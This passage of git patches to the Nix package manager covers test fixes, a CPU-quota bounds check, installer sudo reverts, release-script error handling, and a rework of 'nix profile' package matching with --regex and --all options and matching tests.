--- a/tests/unit/libexpr/primops.cc
+++ b/tests/unit/libexpr/primops.cc
@@ -151,7 +151,7 @@ namespace nix {
     }
 
     TEST_F(PrimOpTest, unsafeGetAttrPos) {
-        state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }");
+        state.corepkgsFS->addFile(CanonPath("foo.nix"), "\n\r\n\r{ y = \"x\"; }");
 
         auto expr = "builtins.unsafeGetAttrPos \"y\" (import )";
         auto v = eval(expr);
@@ -165,10 +165,12 @@ namespace nix {
 
         auto line = v.attrs->find(createSymbol("line"));
         ASSERT_NE(line, nullptr);
-        ASSERT_THAT(*line->value, IsIntEq(1));
+        state.forceValue(*line->value, noPos);
+        ASSERT_THAT(*line->value, IsIntEq(4));
 
         auto column = v.attrs->find(createSymbol("column"));
         ASSERT_NE(column, nullptr);
+        state.forceValue(*column->value, noPos);
         ASSERT_THAT(*column->value, IsIntEq(3));
     }
 
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index aabf156c2..d2d699a64 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -110,8 +110,8 @@ TEST_F(ValuePrintingTests, vLambda)
         .up = nullptr,
         .values = { }
     };
-    PosTable::Origin origin((std::monostate()));
-    auto posIdx = state.positions.add(origin, 1, 1);
+    PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+    auto posIdx = state.positions.add(origin, 0);
     auto body = ExprInt(0);
     auto formals = Formals {};
 
@@ -558,8 +558,8 @@ TEST_F(ValuePrintingTests, ansiColorsLambda)
         .up = nullptr,
         .values = { }
     };
-    PosTable::Origin origin((std::monostate()));
-    auto posIdx = state.positions.add(origin, 1, 1);
+    PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+    auto posIdx = state.positions.add(origin, 0);
     auto body = ExprInt(0);
     auto formals = Formals {};
 

From e4500e539eae64a79ed5309a9c48475edae96218 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Thu, 7 Mar 2024 00:02:21 +0100
Subject: [PATCH 579/654] doc/glossary: Fix file system object anchor

It was stealing the store object id. Browsers pick the first one.
It was confusing.
---
 doc/manual/src/glossary.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index a71b2e2b3..c4d9c2a52 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -86,7 +86,7 @@
 
   [store path]: #gloss-store-path
 
-- [file system object]{#gloss-store-object}
+- [file system object]{#gloss-file-system-object}
 
   The Nix data model for representing simplified file system data.
 

From 9c64a09c709e3f995d7f24cdd5a69435c08488fc Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Wed, 6 Mar 2024 20:52:58 -0800
Subject: [PATCH 580/654] fix: bounds check result in getMaxCPU

Fixes https://github.com/NixOS/nix/issues/9725
---
 src/libutil/current-process.cc | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc
index 47aa137d8..f80f43ef0 100644
--- a/src/libutil/current-process.cc
+++ b/src/libutil/current-process.cc
@@ -38,6 +38,11 @@ unsigned int getMaxCPU()
 
         auto cpuMax = readFile(cpuFile);
         auto cpuMaxParts = tokenizeString>(cpuMax, " \n");
+
+        if (cpuMaxParts.size() != 2) {
+            return 0;
+        }
+
         auto quota = cpuMaxParts[0];
         auto period = cpuMaxParts[1];
         if (quota != "max")

From 739f53aca4f7971165150b910061903c7d015ca6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 08:52:43 +0100
Subject: [PATCH 581/654] Revert "Fix sudo in the darwin installer (#10128)"

This reverts commit 686405ef416955621a89815e07cb64e1ee4f1495.
---
 scripts/install-multi-user.sh | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 4d6a1914e..1dbb93bf9 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -69,17 +69,16 @@ readonly PROXY_ENVIRONMENT_VARIABLES=(
     NO_PROXY
 )
 
-SUDO_KEPT_ENVIRONMENT_VARIABLES=""
+SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
 
 setup_sudo_extra_environment_variables() {
+    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
     for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
         if [ "x${!variable:-}" != "x" ]; then
-            SUDO_KEPT_ENVIRONMENT_VARIABLES="$SUDO_KEPT_ENVIRONMENT_VARIABLES,$variable"
+            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
+            i=$((i + 1))
         fi
     done
-
-    # Required by the darwin installer
-    export SUDO_KEPT_ENVIRONMENT_VARIABLES
 }
 
 setup_sudo_extra_environment_variables
@@ -387,7 +386,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo --preserve-env="$SUDO_KEPT_ENVIRONMENT_VARIABLES" "$@"
+        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
     fi
 }
 

From f175b3a4b755d1955787d66bbf8e2ee483f2b192 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 08:53:14 +0100
Subject: [PATCH 582/654] Revert "`install-multi-user.sh`: `_sudo`: add proxy
 variables to sudo"

This reverts commit 24fd7e2755bed3a854f8089c2db2fed89eb07f56.
---
 scripts/install-multi-user.sh | 27 +--------------------------
 1 file changed, 1 insertion(+), 26 deletions(-)

diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..ad3ee8881 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,31 +58,6 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
 
 readonly ROOT_HOME=~root
 
-readonly PROXY_ENVIRONMENT_VARIABLES=(
-    http_proxy
-    https_proxy
-    ftp_proxy
-    no_proxy
-    HTTP_PROXY
-    HTTPS_PROXY
-    FTP_PROXY
-    NO_PROXY
-)
-
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
-
-setup_sudo_extra_environment_variables() {
-    local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
-    for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
-        if [ "x${!variable:-}" != "x" ]; then
-            SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
-            i=$((i + 1))
-        fi
-    done
-}
-
-setup_sudo_extra_environment_variables
-
 if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
     readonly IS_HEADLESS='no'
 else
@@ -386,7 +361,7 @@ _sudo() {
     if is_root; then
         env "$@"
     else
-        sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+        sudo "$@"
     fi
 }
 

From 0282499e183c3a7aa4aa263b242f4ddcb401220f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 7 Mar 2024 13:28:52 +0100
Subject: [PATCH 583/654] PathInputScheme::getFingerprint(): Don't barf on
 relative paths

This wasn't caught by CI because #10149 and #10152 pass
individually... It doesn't happen on lazy-trees either because we
never try to fetch relative path flakes (#10089).
---
 src/libfetchers/path.cc | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index f1910a5dc..0af1bad73 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -89,6 +89,15 @@ struct PathInputScheme : InputScheme
         writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
     }
 
+    std::optional isRelative(const Input & input) const
+    {
+        auto path = getStrAttr(input.attrs, "path");
+        if (hasPrefix(path, "/"))
+            return std::nullopt;
+        else
+            return path;
+    }
+
     bool isLocked(const Input & input) const override
     {
         return (bool) input.getNarHash();
@@ -151,6 +160,9 @@ struct PathInputScheme : InputScheme
 
     std::optional getFingerprint(ref store, const Input & input) const override
     {
+        if (isRelative(input))
+            return std::nullopt;
+
         /* If this path is in the Nix store, use the hash of the
            store object and the subpath. */
         auto path = getAbsPath(input);

From a3163b9eabb952b4aa96e376dea95ebcca97b31a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 7 Mar 2024 14:52:40 +0100
Subject: [PATCH 584/654] Fix the outputs moving on macOS

---
 src/libstore/build/local-derivation-goal.cc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index 6e8e1fa18..a9b6a8dbf 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2547,8 +2547,8 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 // Replace the output by a fresh copy of itself to make sure
                 // that there's no stale file descriptor pointing to it
                 Path tmpOutput = actualPath + ".tmp";
-                renameFile(actualPath, tmpOutput);
-                copyFile(tmpOutput, actualPath, true);
+                copyFile(actualPath, tmpOutput, true);
+                renameFile(tmpOutput, actualPath);
 
                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
                     .method = dof.ca.method,

From 091f2328962fccfd71602b0b7c072c8d08291c86 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 7 Mar 2024 15:18:03 +0100
Subject: [PATCH 585/654] maintainers/upload-release.pl: Handle 2.3 and 2.18
 branches

---
 maintainers/upload-release.pl | 69 ++++++++++++++++++++++++-----------
 1 file changed, 47 insertions(+), 22 deletions(-)

diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl
index 4e2c379f0..f2830a3af 100755
--- a/maintainers/upload-release.pl
+++ b/maintainers/upload-release.pl
@@ -11,6 +11,8 @@ use JSON::PP;
 use LWP::UserAgent;
 use Net::Amazon::S3;
 
+delete $ENV{'shell'}; # shut up a LWP::UserAgent.pm warning
+
 my $evalId = $ARGV[0] or die "Usage: $0 EVAL-ID\n";
 
 my $releasesBucketName = "nix-releases";
@@ -36,9 +38,9 @@ sub fetch {
 my $evalUrl = "https://hydra.nixos.org/eval/$evalId";
 my $evalInfo = decode_json(fetch($evalUrl, 'application/json'));
 #print Dumper($evalInfo);
-my $flakeUrl = $evalInfo->{flake} or die;
-my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die);
-my $nixRev = $flakeInfo->{revision} or die;
+my $flakeUrl = $evalInfo->{flake};
+my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die) if $flakeUrl;
+my $nixRev = ($flakeInfo ? $flakeInfo->{revision} : $evalInfo->{jobsetevalinputs}->{nix}->{revision}) or die;
 
 my $buildInfo = decode_json(fetch("$evalUrl/job/build.x86_64-linux", 'application/json'));
 #print Dumper($buildInfo);
@@ -83,12 +85,19 @@ my $channelsBucket = $s3_us->bucket($channelsBucketName) or die;
 sub getStorePath {
     my ($jobName, $output) = @_;
     my $buildInfo = decode_json(fetch("$evalUrl/job/$jobName", 'application/json'));
-    return $buildInfo->{buildoutputs}->{$output or "out"}->{path} or die "cannot get store path for '$jobName'";
+    return $buildInfo->{buildoutputs}->{$output or "out"}->{path} // die "cannot get store path for '$jobName'";
 }
 
 sub copyManual {
-    my $manual = getStorePath("build.x86_64-linux", "doc");
-    print "$manual\n";
+    my $manual;
+    eval {
+        $manual = getStorePath("build.x86_64-linux", "doc");
+    };
+    if ($@) {
+        warn "$@";
+        return;
+    }
+    print "Manual: $manual\n";
 
     my $manualNar = "$tmpDir/$releaseName-manual.nar.xz";
     print "$manualNar\n";
@@ -154,19 +163,33 @@ downloadFile("binaryTarball.x86_64-linux", "1");
 downloadFile("binaryTarball.aarch64-linux", "1");
 downloadFile("binaryTarball.x86_64-darwin", "1");
 downloadFile("binaryTarball.aarch64-darwin", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+eval {
+    downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
+eval {
+    downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
 downloadFile("installerScript", "1");
 
 # Upload docker images to dockerhub.
 my $dockerManifest = "";
 my $dockerManifestLatest = "";
+my $haveDocker = 0;
 
 for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
     my $system = $platforms->[0];
     my $dockerPlatform = $platforms->[1];
     my $fn = "nix-$version-docker-image-$dockerPlatform.tar.gz";
-    downloadFile("dockerImage.$system", "1", $fn);
+    eval {
+        downloadFile("dockerImage.$system", "1", $fn);
+    };
+    if ($@) {
+        warn "$@" if $@;
+        next;
+    }
+    $haveDocker = 1;
 
     print STDERR "loading docker image for $dockerPlatform...\n";
     system("docker load -i $tmpDir/$fn") == 0 or die;
@@ -194,21 +217,23 @@ for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
     $dockerManifestLatest .= " --amend $latestTag"
 }
 
-print STDERR "creating multi-platform docker manifest...\n";
-system("docker manifest rm nixos/nix:$version");
-system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
-if ($isLatest) {
-    print STDERR "creating latest multi-platform docker manifest...\n";
-    system("docker manifest rm nixos/nix:latest");
-    system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
-}
+if ($haveDocker) {
+    print STDERR "creating multi-platform docker manifest...\n";
+    system("docker manifest rm nixos/nix:$version");
+    system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
+    if ($isLatest) {
+        print STDERR "creating latest multi-platform docker manifest...\n";
+        system("docker manifest rm nixos/nix:latest");
+        system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
+    }
 
-print STDERR "pushing multi-platform docker manifest...\n";
-system("docker manifest push nixos/nix:$version") == 0 or die;
+    print STDERR "pushing multi-platform docker manifest...\n";
+    system("docker manifest push nixos/nix:$version") == 0 or die;
 
-if ($isLatest) {
-    print STDERR "pushing latest multi-platform docker manifest...\n";
-    system("docker manifest push nixos/nix:latest") == 0 or die;
+    if ($isLatest) {
+        print STDERR "pushing latest multi-platform docker manifest...\n";
+        system("docker manifest push nixos/nix:latest") == 0 or die;
+    }
 }
 
 # Upload nix-fallback-paths.nix.

From 4b4c71e2391802ed98e0274b631cba1a4cfa66f9 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Thu, 7 Mar 2024 08:15:25 -0800
Subject: [PATCH 586/654] Restore "checking Hydra job" message in `nix flake
 check`

Mistakenly removed in #8893, thanks @lf- for catching this!

https://github.com/NixOS/nix/commit/9404ce36e4edd1df12892089bdab1ceb7d4d7a97#r139485316
---
 src/nix/flake.cc | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 1822b990f..a846f6371 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -482,6 +482,8 @@ struct CmdFlakeCheck : FlakeCommand
 
         checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) {
             try {
+                Activity act(*logger, lvlInfo, actUnknown,
+                    fmt("checking Hydra job '%s'", attrPath));
                 state->forceAttrs(v, pos, "");
 
                 if (state->isDerivation(v))

From 741a6bfad53d1efbc34fb148c8ca4b9dc01691d4 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 22:27:16 +0100
Subject: [PATCH 587/654] profile: allow different types of matchers

---
 src/nix/profile.cc | 164 ++++++++++++++++++++++++---------------------
 1 file changed, 89 insertions(+), 75 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index fc669d5ed..41dcccc50 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -453,55 +453,86 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
     }
 };
 
-class MixProfileElementMatchers : virtual Args
+enum MatcherType
 {
-    std::vector _matchers;
+    Regex,
+    StorePath,
+};
+
+struct Matcher
+{
+    MatcherType type;
+    std::string title;
+    std::function matches;
+};
+
+Matcher createRegexMatcher(const std::string & pattern)
+{
+    std::regex reg(pattern, std::regex::extended | std::regex::icase);
+    return {
+        .type = MatcherType::Regex,
+        .title = fmt("Regex '%s'", pattern),
+        .matches = [reg](const std::string &name, const ProfileElement & element) {
+            return std::regex_match(element.identifier(), reg);
+        },
+    };
+}
+
+Matcher createStorePathMatcher(const nix::StorePath & storePath)
+{
+    return {
+        .type = MatcherType::StorePath,
+        .title = fmt("Store path '%s'", storePath.to_string()),
+        .matches = [storePath](const std::string &name, const ProfileElement & element) {
+            return element.storePaths.count(storePath);
+        }
+    };
+}
+
+class MixProfileElementMatchers : virtual Args, virtual StoreCommand
+{
+    std::vector _matchers;
 
 public:
 
     MixProfileElementMatchers()
     {
-        expectArgs("elements", &_matchers);
+        expectArgs(ExpectedArg {
+            .label = "elements",
+            .optional = true,
+            .handler = {[this](std::vector args) {
+                for (auto & arg : args) {
+                    if (auto n = string2Int(arg)) {
+                        throw Error("'nix profile' no longer supports indices ('%d')", *n);
+                    } else if (getStore()->isStorePath(arg)) {
+                        _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
+                    } else {
+                        _matchers.push_back(createRegexMatcher(arg));
+                    }
+                }
+            }}
+        });
     }
 
-    struct RegexPattern {
-        std::string pattern;
-        std::regex  reg;
-    };
-    typedef std::variant Matcher;
-
-    std::vector getMatchers(ref store)
-    {
-        std::vector res;
-
-        for (auto & s : _matchers) {
-            if (auto n = string2Int(s))
-                throw Error("'nix profile' no longer supports indices ('%d')", *n);
-            else if (store->isStorePath(s))
-                res.push_back(s);
-            else
-                res.push_back(RegexPattern{s,std::regex(s, std::regex::extended | std::regex::icase)});
+    std::set getMatchingElementNames(ProfileManifest & manifest) {
+        if (_matchers.empty()) {
+            throw UsageError("No packages specified.");
         }
 
-        return res;
-    }
-
-    bool matches(
-        const Store & store,
-        const std::string & name,
-        const ProfileElement & element,
-        const std::vector & matchers)
-    {
-        for (auto & matcher : matchers) {
-            if (auto path = std::get_if(&matcher)) {
-                if (element.storePaths.count(store.parseStorePath(*path))) return true;
-            } else if (auto regex = std::get_if(&matcher)) {
-                if (std::regex_match(name, regex->reg))
-                    return true;
+        std::set result;
+        for (auto & matcher : _matchers) {
+            bool foundMatch = false;
+            for (auto & [name, element] : manifest.elements) {
+                if (matcher.matches(name, element)) {
+                    result.insert(name);
+                    foundMatch = true;
+                }
+            }
+            if (!foundMatch) {
+                warn("%s does not match any packages in the profile.", matcher.title);
             }
         }
-
-        return false;
+        return result;
     }
 };
 
@@ -523,16 +554,19 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
     {
         ProfileManifest oldManifest(*getEvalState(), *profile);
 
-        auto matchers = getMatchers(store);
+        ProfileManifest newManifest = oldManifest;
 
-        ProfileManifest newManifest;
+        auto matchingElementNames = getMatchingElementNames(oldManifest);
 
-        for (auto & [name, element] : oldManifest.elements) {
-            if (!matches(*store, name, element, matchers)) {
-                newManifest.elements.insert_or_assign(name, std::move(element));
-            } else {
-                notice("removing '%s'", element.identifier());
-            }
+        if (matchingElementNames.empty()) {
+            warn ("No packages to remove. Use 'nix profile list' to see the current profile.");
+            return;
+        }
+
+        for (auto & name : matchingElementNames) {
+            auto & element = oldManifest.elements[name];
+            notice("removing '%s'", element.identifier());
+            newManifest.elements.erase(name);
         }
 
         auto removedCount = oldManifest.elements.size() - newManifest.elements.size();
@@ -540,16 +574,6 @@ struct CmdProfileRemove : virtual EvalCommand, MixDefaultProfile, MixProfileElem
             removedCount,
             newManifest.elements.size());
 
-        if (removedCount == 0) {
-            for (auto matcher: matchers) {
-                if (const Path * path = std::get_if(&matcher)) {
-                    warn("'%s' does not match any paths", *path);
-                } else if (const RegexPattern * regex = std::get_if(&matcher)) {
-                    warn("'%s' does not match any packages", regex->pattern);
-                }
-            }
-            warn ("Use 'nix profile list' to see the current profile.");
-        }
         updateProfile(newManifest.build(store));
     }
 };
@@ -572,20 +596,20 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
     {
         ProfileManifest manifest(*getEvalState(), *profile);
 
-        auto matchers = getMatchers(store);
-
         Installables installables;
         std::vector elems;
 
-        auto matchedCount = 0;
         auto upgradedCount = 0;
 
-        for (auto & [name, element] : manifest.elements) {
-            if (!matches(*store, name, element, matchers)) {
-                continue;
-            }
+        auto matchingElementNames = getMatchingElementNames(manifest);
 
-            matchedCount++;
+        if (matchingElementNames.empty()) {
+            warn("No packages to upgrade. Use 'nix profile list' to see the current profile.");
+            return;
+        }
+
+        for (auto & name : matchingElementNames) {
+            auto & element = manifest.elements[name];
 
             if (!element.source) {
                 warn(
@@ -641,18 +665,8 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
         }
 
         if (upgradedCount == 0) {
-            if (matchedCount == 0) {
-                for (auto & matcher : matchers) {
-                    if (const Path * path = std::get_if(&matcher)) {
-                        warn("'%s' does not match any paths", *path);
-                    } else if (const RegexPattern * regex = std::get_if(&matcher)) {
-                        warn("'%s' does not match any packages", regex->pattern);
-                    }
-                }
-            } else {
-                warn("Found some packages but none of them could be upgraded.");
-            }
-            warn ("Use 'nix profile list' to see the current profile.");
+            warn("Found some packages but none of them could be upgraded.");
+            return;
         }
 
         auto builtPaths = builtPathsPerInstallable(

From d6f5da51d3ae11c6771c68ebb65e7a560af167b5 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 22:33:37 +0100
Subject: [PATCH 588/654] profile: match on package name instead of regex

---
 src/nix/profile.cc | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index 41dcccc50..d79f1158b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -457,6 +457,7 @@ enum MatcherType
 {
     Regex,
     StorePath,
+    Name,
 };
 
 struct Matcher
@@ -489,6 +490,16 @@ Matcher createStorePathMatcher(const nix::StorePath & storePath)
     };
 }
 
+Matcher createNameMatcher(const std::string & name) {
+    return {
+        .type = MatcherType::Name,
+        .title = fmt("Package name '%s'", name),
+        .matches = [name](const std::string &elementName, const ProfileElement & element) {
+            return elementName == name;
+        }
+    };
+}
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
     std::vector _matchers;
@@ -507,7 +518,7 @@ public:
                     } else if (getStore()->isStorePath(arg)) {
                         _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
                     } else {
-                        _matchers.push_back(createRegexMatcher(arg));
+                        _matchers.push_back(createNameMatcher(arg));
                     }
                 }
             }}

From 87741dbd2118b0c90db6a37525b36c7bc93617ce Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Thu, 7 Mar 2024 20:33:59 +0100
Subject: [PATCH 589/654] profile: add --regex option to match packages

---
 src/nix/profile-remove.md       |  2 +-
 src/nix/profile-upgrade.md      |  2 +-
 src/nix/profile.cc              | 10 +++++++++-
 tests/functional/nix-profile.sh | 10 ++++++++++
 4 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index 1f6532250..e2dea3389 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,7 +11,7 @@ R""(
 * Remove all packages:
 
   ```console
-  # nix profile remove '.*'
+  # nix profile remove --regex '.*'
   ```
 
 * Remove a package by store path:
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index 432b8fa94..e04ad109e 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
   reference:
 
   ```console
-  # nix profile upgrade '.*'
+  # nix profile upgrade --regex '.*'
   ```
 
 * Upgrade a specific package by name:
diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d79f1158b..c08d02e70 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -508,7 +508,15 @@ public:
 
     MixProfileElementMatchers()
     {
-        expectArgs(ExpectedArg {
+        addFlag({
+            .longName = "regex",
+            .description = "A regular expression to match one or more packages in the profile.",
+            .labels = {"pattern"},
+            .handler = {[this](std::string arg) {
+                _matchers.push_back(createRegexMatcher(arg));
+            }},
+        });
+        expectArgs({
             .label = "elements",
             .optional = true,
             .handler = {[this](std::vector args) {
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 88b713d53..274b72de2 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -71,6 +71,16 @@ nix profile upgrade flake1
 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]]
 nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man"
 
+# Test upgrading package using regular expression.
+printf 2.1 > $flake1Dir/version
+nix profile upgrade --regex '.*'
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
+nix profile rollback
+
+# Test removing all packages using regular expression.
+nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
+nix profile rollback
+
 # Test 'history', 'diff-closures'.
 nix profile diff-closures
 

From 9fac62435c5f05783456512b09e3f207a9d62004 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 23:35:10 +0100
Subject: [PATCH 590/654] tests/functional: add assertStderr function

Currently there isn't a convenient way to check for multiline output. In
addition, these outputs will easily change and having a diff between the
expected an the actual output upon failures is convenient.
---
 tests/functional/common/vars-and-functions.sh.in | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in
index 8fef29f97..3975986c0 100644
--- a/tests/functional/common/vars-and-functions.sh.in
+++ b/tests/functional/common/vars-and-functions.sh.in
@@ -216,6 +216,17 @@ expectStderr() {
     return 0
 }
 
+# Run a command and check whether the stderr matches stdin.
+# Show a diff when output does not match.
+# Usage:
+#
+#   assertStderr nix profile remove nothing << EOF
+#   error: This error is expected
+#   EOF
+assertStderr() {
+    diff -u /dev/stdin <($@ 2>/dev/null 2>&1)
+}
+
 needLocalStore() {
   if [[ "$NIX_REMOTE" == "daemon" ]]; then
     skipTest "Can’t run through the daemon ($1)"

From fb391ebc77cc02d74eae4b4826137ed0d79b0455 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 28 Feb 2024 23:39:45 +0100
Subject: [PATCH 591/654] profile: add tests for not matching any packages

---
 tests/functional/nix-profile.sh | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index 274b72de2..67c8bcc98 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -77,6 +77,18 @@ nix profile upgrade --regex '.*'
 [[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
 nix profile rollback
 
+# Test matching no packages using literal package name.
+assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
+warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test matching no packages using regular expression.
+assertStderr nix --offline profile upgrade --regex '.*unknown_package.*' << EOF
+warning: Regex '.*unknown_package.*' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
 # Test removing all packages using regular expression.
 nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
 nix profile rollback
@@ -85,6 +97,10 @@ nix profile rollback
 nix profile diff-closures
 
 # Test rollback.
+printf World > $flake1Dir/who
+nix profile upgrade flake1
+printf NixOS > $flake1Dir/who
+nix profile upgrade flake1
 nix profile rollback
 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]]
 

From 7a4d5e89d33de9d2c656a3d5b4fd44d9cf2cb05d Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Wed, 6 Mar 2024 22:04:53 +0100
Subject: [PATCH 592/654] profile: add --all option to match any package

---
 src/nix/profile-remove.md       |  9 ++++++++-
 src/nix/profile-upgrade.md      |  8 +++++++-
 src/nix/profile.cc              | 16 ++++++++++++++++
 tests/functional/nix-profile.sh |  7 +++++++
 4 files changed, 38 insertions(+), 2 deletions(-)

diff --git a/src/nix/profile-remove.md b/src/nix/profile-remove.md
index e2dea3389..e7e5e0dfb 100644
--- a/src/nix/profile-remove.md
+++ b/src/nix/profile-remove.md
@@ -11,9 +11,16 @@ R""(
 * Remove all packages:
 
   ```console
-  # nix profile remove --regex '.*'
+  # nix profile remove --all
   ```
 
+* Remove packages by regular expression:
+
+  ```console
+  # nix profile remove --regex '.*vim.*'
+  ```
+
+
 * Remove a package by store path:
 
   ```console
diff --git a/src/nix/profile-upgrade.md b/src/nix/profile-upgrade.md
index e04ad109e..da7a668db 100644
--- a/src/nix/profile-upgrade.md
+++ b/src/nix/profile-upgrade.md
@@ -6,7 +6,7 @@ R""(
   reference:
 
   ```console
